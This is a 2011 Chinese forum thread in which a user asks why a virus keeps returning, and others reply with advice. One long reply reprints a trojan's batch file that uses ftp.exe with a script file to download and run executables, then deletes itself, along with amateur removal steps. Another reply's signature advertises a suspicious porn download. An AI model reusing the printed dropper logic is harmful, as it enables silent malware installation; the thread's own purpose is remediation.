求助高手这是神马病毒、杀了几次都杀不干净啊、

社区服务
高级搜索
猴岛论坛聊天交友&心情咖啡求助高手这是神马病毒、杀了几次都杀不干净啊、
发帖 回复
正序阅读 最近浏览的帖子最近浏览的版块
25个回复

[闲话拉呱]求助高手这是神马病毒、杀了几次都杀不干净啊、

楼层直达
夏至未至╮

ZxID:12956357

等级: 上将
Lucky seven、

举报 只看楼主 使用道具 楼主   发表于: 2011-08-21 0
最开始是无缘无故的弹出这个                    
然后我选了阻止、然后确定就又弹出了一个
这是那两个文件、                                      
我查了百度、说是在根目录里面删除  但是还是会弹出来、、        求解啊、    还有我就是重装了一下系统才出现这种情况的、 以前没有啊

本帖de评分: 1 条评分 DB +1
DB+1 2011-08-21

被搞啦你的机子,感觉断网杀毒,格式化C盘,不然当你肉鸡玩

热会7队
请叫我丶山水

ZxID:15748916

等级: 上校
没怎么上猴岛啊~~~~

举报 只看该作者 25楼  发表于: 2011-08-24 0
恭喜LZ
 待决笔墨痕干

ZxID:15500568

等级: 大元帅
                                

举报 只看该作者 24楼  发表于: 2011-08-22 0
果断重装。
苍井空无码种子大全.zip  [点击下载] (327.6 K)  下载次数:1370260  累计下载获得 DB 2504670
丨|丨

ZxID:13626842

等级: 一代君主

举报 只看该作者 23楼  发表于: 2011-08-22 0
建议你找电脑技术人员维修~
a6818657

ZxID:3757452

等级: 上士
举报 只看该作者 22楼  发表于: 2011-08-21 0
回 楼主(夏至未至╮) 的帖子
感染的:木马程序 Trojan-Downloader.VBS.Agent.lg C:\WINDOWS\help\bai.VBS 926 字节
感染的:木马程序 Trojan.BAT.Runner.m C:\WINDOWS\help\bai.BAT 321 字节
一般来说非常顽固,感染后还会出来祸害。

一、分析:

把bai.bat文件改成TXT后缀 看了里面东西 写的是

del cc.exe
ftp.exe -s:C:\WINDOWS\help\help.dll
if not exist cc.exe sfd -s:C:\WINDOWS\help\help.dll
if not exist cc.exe sft -s:C:\WINDOWS\help\help.dll
cc.exe
cc.exe
cc1.exe
cc1.exe
if not exist cc.exe C:\WINDOWS\help\bai.VBS
:end
del C:\WINDOWS\help\help.dll
del C:\WINDOWS\help\bai.BAT
exit

    打开 help.dll 看看里面有一段代码 open 一个ip地址 很明显 从这里下载的bai.vbs 以及bai.bat 2个文件 一个是批处理文件 一个是数据库文件 来支持批处理文件。

二、 处理方法

方法1:
    这个木马最讨厌的地方在于,杀掉还会再生。木马原始文件好像还没有人找到。但是可以使用免疫的方法废掉它的武功。
病毒文件在windows/help文件夹里生成bai.batbai.vbshelp.dll(或许文件名称会有不同)请用记事本打开这些文件,讲里面的东西删光,再保存。或者删除文件再用记事本新建同名同扩展名的空文件。然后文件属性改成只读。OK!这样它再也不能发作了。
这招基本对所有会再生的病毒和木马都有效!~

    大家中的不一样,所以文件名不同是正常的,这几个文件的作用就是从指定网站下载大量病毒和木马。很多新病毒木马都是用的这样的方法,不过文件和存放位置不同,大家要仔细找找,*.bat这个文件是判断你的机子里有没有他们的病毒,没有就调用help.dll和ftp从help.dll指定的网站下载主要的病毒体。自己要找到这几个文件,做成空文件代替,用360检查还有,但是那已经是你做的空文件了,没有任何危害你的能力了。
这几个文件通常会在c盘根目录下,windows下windows/help下和system32下,自己好好找找,help.dll和*.vbs可以用记事本打开,*.bat可以直接右键编辑,里面的内容字要懂点英文很容易看懂。

方法2:

    FTPPOPO木马,大家我相信很熟悉(汗``)主要症状就是:进程中有qoq.exe文件(注意,qoq才是FTPPOPO木马的最终祸首),并且FTPPOPO木马删除掉还会有,玩游戏超级卡,时间被改回2001年7月15或者还有别的时间,解决办法:第一步:进入安全模式,在安全模式下打开系统C盘,在C:\\WINDOWS\\system32目录下发现一个qoq.exe文件(一定要仔细找),同时搜索到在System32\\wbem目录下的SAChost.exe文件(有的电脑可能没有,没有最好拉),删除这两个文件。 第二步:删除系统临时文件(别告诉我你不会),断开网络,重启电脑,并且进入正常模式在C:\\WINDOWS\\system32目录创建一个qoq.exe相同的应用程序(只需要建立一个新文件夹,改名为:qoq.exe),属性改为只读,在C:\\WINDOWS\\system32\\wbem目录下创建一个SAChost.exe文件(同上)属性改为只读,打开注册表,找到qoq.exe所在项和值然后删除(打开注册表方法:开始-运行-regedit,点查找 ,打上qoq.exe),最后一步,打开360安全卫士,清理恶评插件,清除FTPPOPO木马,然后用杀毒软件全盘杀毒,杀完重启,看一下是不是没有QOQ进程和FTPPOPO木马了``那你就成功拉呵呵。
    对了还有重要一步,竟然忘记了,在进行我所说的方法同时,你们在安全模式下检查c:windows/help有bai.bat bai.vbs和help.dll,3个文件没有,如果有,就删除,此文件是隐藏文件,查看前请先设置文件夹显示全部内容。


方法3:

    我之前也深受其扰,现在好几天了都没复发过.大家可以试试网络猪屁的办法。先把360和卡巴都升级到最新.然后断开网络连接(重要)杀恶意插件木马和病毒.都处理以后到windows/help文件夹建立三个空文件夹
分别命名为bai.bat bai.vbs和help.dll。
    然后利用IP策略把机器的135,139这些容易被病毒入侵的端口关闭。

1、单击“开始”——“运行”,输入“dcomcnfg”,单击“确定”,打开组件服务。
2、在弹出的“组件服务”对话框中,选择“计算机”选项。
3、在“计算机”选项右边,右键单击“我的电脑”,选择“属性”。
4、在出现的“我的电脑属性”对话框“默认属性”选项卡中,去掉“在此计算机上启用分布式COM”前的勾。
5、选择“默认协议”选项卡,选中“面向连接的TCP/IP”,单击“删除”按钮。
6、单击“确定”按钮,设置完成,重新启动后即可关闭135端口。

收淫員

ZxID:15901787

等级: 上等兵
举报 只看该作者 21楼  发表于: 2011-08-21 0
我晕  你和我遇到的病毒一样  我直接重装  不解释
UID:790

ZxID:790

等级: 大将
世间繁华、             &n ..

举报 只看该作者 20楼  发表于: 2011-08-21 0
格式化就好了,跟以前的手机病毒差不多,中了文件夹就隐藏,删除也删除不掉!!
_残雪

ZxID:15164442

等级: 少将
。泪稀
举报 只看该作者 19楼  发表于: 2011-08-21 0
人送外号  死缠烂打病毒

154430801

ZxID:15903300

等级: 准尉
TTD游戏站ttdao.net
举报 只看该作者 18楼  发表于: 2011-08-21 0
这么强大的病毒,你重装系统吧
毒品≈

ZxID:5612912

等级: 大将
配偶: 7★XXXXX

举报 只看该作者 17楼  发表于: 2011-08-21 0
表示肉鸡毒
简.

ZxID:10955214

等级: 元老
配偶: 繁.
To Dearest WY

举报 只看该作者 16楼  发表于: 2011-08-21 0
重装把,,
不想成为什么样的人,只想好好活着。
bape.

ZxID:1657512

等级: 贵宾

举报 只看该作者 15楼  发表于: 2011-08-21 0
重装 吧 孩子
相溪望

ZxID:13159891

等级: 中将
   霸气敏哥~!  

举报 只看该作者 14楼  发表于: 2011-08-21 0
我想说。。你可以吧必要的系统执行程序转移到D  看能不能格式化C  我想应该可以的吧
此人不坑爹丶

ZxID:10499717

等级: 上尉
别用你舔过龟头的嘴说爱我...
举报 只看该作者 13楼  发表于: 2011-08-21 0
表示没遇到过
  暖冬°

ZxID:12976151

等级: 大将
生亦何欢          死亦何苦

举报 只看该作者 12楼  发表于: 2011-08-21 0
你的机子太有诱惑力了把  黑客都看上你了
〆 ˉ 浅唱

ZxID:3571785

等级: 元老
配偶: Kawa1,柔
                                            花非花 ..

举报 只看该作者 11楼  发表于: 2011-08-21 0
  换硬盘 一劳永逸
喝曲听小酒り

ZxID:10740007

等级: 元帅

举报 只看该作者 10楼  发表于: 2011-08-21 0
重装
_Smileヾ冰茶c

ZxID:8949806

等级: 贵宾
回来真好

举报 只看该作者 9楼  发表于: 2011-08-21 0
用别的杀软呢?脱离网络的情况下杀毒 安全模式最好了
fxzx0715

ZxID:15900097

等级: 新兵
举报 只看该作者 8楼  发表于: 2011-08-21 0
神马真强大,我也没看到过,这病毒不是会新变种吧。












SIGNATURE...............................................................................................................................
倚天屠龙记新手卡,诛仙2新手卡号,咸宁信息网
°逝然陌づ

ZxID:10251663

等级: 大元帅
                      

举报 只看该作者 7楼  发表于: 2011-08-21 0
真厉害。
« 返回列表
发帖 回复